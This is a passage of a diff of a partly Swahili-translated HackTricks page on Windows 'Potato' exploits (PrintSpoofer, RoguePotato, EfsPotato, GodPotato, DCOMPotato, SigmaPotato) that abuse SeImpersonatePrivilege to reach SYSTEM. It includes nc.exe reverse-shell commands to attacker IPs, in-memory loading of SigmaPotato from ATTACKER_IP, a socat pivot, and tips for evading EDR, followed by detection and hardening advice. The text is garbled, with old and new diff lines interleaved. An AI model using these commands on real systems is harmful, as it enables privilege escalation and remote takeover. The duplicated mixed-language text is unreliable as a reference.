- Ngazi ya uaminifu ya juu haitegemeeki ikiwa token tayari ina SeImpersonatePrivilege (kawaida kwa akaunti za huduma nyingi kama IIS AppPool, MSSQL, n.k.)
- SeImpersonatePrivilege (ya kawaida zaidi) au SeAssignPrimaryTokenPrivilege
- High integrity is not required if the token already has SeImpersonatePrivilege (kawaida kwa akaunti nyingi za huduma kama IIS AppPool, MSSQL, n.k.)
Check privileges quickly:
Angalia vibali haraka:
```cmd
whoami /priv | findstr /i impersonate
```
Operational notes:
Vidokezo vya uendeshaji:
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). In hardened environments where Spooler is disabled post-PrintNightmare, prefer RoguePotato/GodPotato/DCOMPotato/EfsPotato.
- RoguePotato requires an OXID resolver reachable on TCP/135. If egress is blocked, use a redirector/port-forwarder (see example below). Older builds needed the -f flag.
- EfsPotato/SharpEfsPotato abuse MS-EFSR; if one pipe is blocked, try alternative pipes (lsarpc, efsrpc, samr, lsass, netlogon).
- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; try a different pipe/transport or ensure the target service is running.
- Ikiwa shell yako inaendesha chini ya token iliyopunguzwa ambayo haijumuishi SeImpersonatePrivilege (kwa kawaida kwa Local Service/Network Service katika muktadha fulani), pata tena sifa za akaunti kwa kutumia FullPowers, kisha endesha Potato. Mfano: `FullPowers.exe -c "cmd /c whoami /priv" -z`
- PrintSpoofer needs the Print Spooler service running and reachable over the local RPC endpoint (spoolss). Katika mazingira yaliyofungwa ambapo Spooler imezimwa baada ya PrintNightmare, pendelea RoguePotato/GodPotato/DCOMPotato/EfsPotato.
- RoguePotato requires an OXID resolver reachable on TCP/135. Ikiwa egress imezuiwa, tumia redirector/port-forwarder (angalia mfano hapo chini). Toleo la zamani lilihitaji bendera -f.
- EfsPotato/SharpEfsPotato wanatumia MS-EFSR; ikiwa pipa moja imezuiwa, jaribu pipa mbadala (lsarpc, efsrpc, samr, lsass, netlogon).
- Error 0x6d3 during RpcBindingSetAuthInfo typically indicates an unknown/unsupported RPC authentication service; jaribu pipa/usafirishaji tofauti au hakikisha huduma lengwa inaendelea kuendesha.
## Demo ya Haraka
@ -58,8 +59,8 @@ NULL
```
Vidokezo:
- Unaweza kutumia -i kuanzisha interactive process kwenye current console, au -c kuendesha one-liner.
- Inahitaji Spooler service. Ikiwa imezimwa, hii itashindwa.
- Unaweza kutumia -i kuanzisha interactive process katika console ya sasa, au -c kuendesha one-liner.
- Inahitaji Spooler service. Ikiwa imezimwa, haitafanya kazi.
### RoguePotato
```bash
@ -67,7 +68,7 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
```
Ikiwa outbound 135 imezuiwa, pivot the OXID resolver kupitia socat kwenye redirector yako:
Ikiwa trafiki ya kwenda nje kwa port 135 imezuiwa, pivot OXID resolver kupitia socat kwenye redirector wako:
```bash
# On attacker redirector (must listen on TCP/135 and forward to victim:9999)
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999
@ -111,7 +112,7 @@ CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes su
nt authority\system
```
Kidokezo: Ikiwa pipe moja inashindwa au EDR inaizuia, jaribu pipes nyingine zinazoungwa mkono:
Kidokezo: Ikiwa pipa moja itashindwa au EDR italizuia, jaribu pipa nyingine zinazoungwa mkono:
```text
EfsPotato <cmd> [pipe]
pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
@ -123,13 +124,13 @@ pipe -> lsarpc|efsrpc|samr|lsass|netlogon (default=lsarpc)
> GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
Vidokezo:
- Inafanya kazi katika Windows 8/8.111 na Server 20122022 wakati SeImpersonatePrivilege ipo.
- Inafanya kazi kwenye Windows 8/8.111 na Server 20122022 pale SeImpersonatePrivilege inapatikana.
### DCOMPotato
![image](https://github.com/user-attachments/assets/a3153095-e298-4a4b-ab23-b55513b60caa)
DCOMPotato inatoa matoleo mawili zinazolenga service DCOM objects ambazo kwa chaguo-msingi huweka RPC_C_IMP_LEVEL_IMPERSONATE. Jenga au tumia binaries zilizotolewa kisha endesha amri yako:
DCOMPotato inatoa toleo mbili zinazolenga service DCOM objects ambazo kwa chaguo-msingi hutumia RPC_C_IMP_LEVEL_IMPERSONATE. Jenga au tumia binaries zilizotolewa kisha endesha amri yako:
```cmd
# PrinterNotify variant
PrinterNotifyPotato.exe "cmd /c whoami"
@ -137,9 +138,9 @@ PrinterNotifyPotato.exe "cmd /c whoami"
# McpManagementService variant (Server 2022 also)
McpManagementPotato.exe "cmd /c whoami"
```
### SigmaPotato (imeboreshwa fork ya GodPotato)
### SigmaPotato (fork ya GodPotato iliyosasishwa)
SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kwa kutumia .NET reflection na PowerShell reverse shell helper.
SigmaPotato inaongeza vipengele vya kisasa kama utekelezaji ndani ya kumbukumbu kupitia .NET reflection na msaidizi wa PowerShell reverse shell.
```powershell
# Load and execute from memory (no disk touch)
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://ATTACKER_IP/SigmaPotato.exe"))
@ -148,13 +149,13 @@ SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kwa kutumia
# Or ask it to spawn a PS reverse shell
[SigmaPotato]::Main(@("--revshell","ATTACKER_IP","4444"))
```
## Vidokezo vya ugundaji na kuimarisha
## Utambuzi na vidokezo vya kuimarisha
- Angalia processes zinazounda named pipes na mara moja kuita token-duplication APIs ikifuatiwa na CreateProcessAsUser/CreateProcessWithTokenW. Sysmon inaweza kuonyesha telemetry muhimu: Event ID 1 (process creation), 17/18 (named pipe created/connected), na command lines zinazozalisha child processes kama SYSTEM.
- Spooler hardening: Kuizima Print Spooler service kwenye servers ambapo haitegemeiuzu huzuia PrintSpoofer-style local coercions kupitia spoolss.
- Service account hardening: Punguza utoaji wa SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege kwa custom services. Fikiria kuendesha services chini ya virtual accounts zenye least privileges zinazohitajika na kuziwekea isolations kwa service SID na write-restricted tokens inapowezekana.
- Network controls: Ku/block outbound TCP/135 au kuzuia RPC endpoint mapper traffic kunaweza kuvunja RoguePotato isipokuwa internal redirector ipo.
- EDR/AV: Zana hizi zote zina signatures nyingi. Recompiling from source, kubadili majina ya symbols/strings, au kutumia in-memory execution kunaweza kupunguza detection lakini haitashinda behavioral detections imara.
- Fuatilia mchakato unaounda named pipes na mara moja kuita token-duplication APIs ikifuatiwa na CreateProcessAsUser/CreateProcessWithTokenW. Sysmon inaweza kuonyesha telemetry muhimu: Event ID 1 (utengenezaji wa process), 17/18 (named pipe imeundwa/imeunganishwa), na mistari ya amri inayozalisha mchakato wa mtoto kama SYSTEM.
- Spooler hardening: Kuzima huduma ya Print Spooler kwenye servers zisizohitajika kunazuia shambulio za ndani za aina ya PrintSpoofer kupitia spoolss.
- Service account hardening: Punguza utoaji wa SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege kwa services maalum. Fikiria kuendesha services chini ya virtual accounts zenye vibali vya chini kabisa vinavyohitajika na kuzitenga kwa kutumia service SID na write-restricted tokens pale inapowezekana.
- Network controls: Kuziba outbound TCP/135 au kupunguza trafiki ya RPC endpoint mapper kunaweza kuvunja RoguePotato isipokuwa redirector wa ndani upo.
- EDR/AV: Zana hizi zote zina signatures nyingi. Kucompile tena kutoka source, kubadilisha symbols/strings, au kutumia utekelezaji kwa memory kunaweza kupunguza utambuzi lakini haitaweza kuzuia utambuzi wa tabia thabiti.
## Marejeo
@ -167,5 +168,7 @@ SigmaPotato inaongeza vipengele vya kisasa kama in-memory execution kwa kutumia
- [https://github.com/zcgonvh/DCOMPotato](https://github.com/zcgonvh/DCOMPotato)
- [https://github.com/tylerdotrar/SigmaPotato](https://github.com/tylerdotrar/SigmaPotato)
- [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)
- [FullPowers Restore default token privileges for service accounts](https://github.com/itm4n/FullPowers)
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
{{#include ../../banners/hacktricks-training.md}}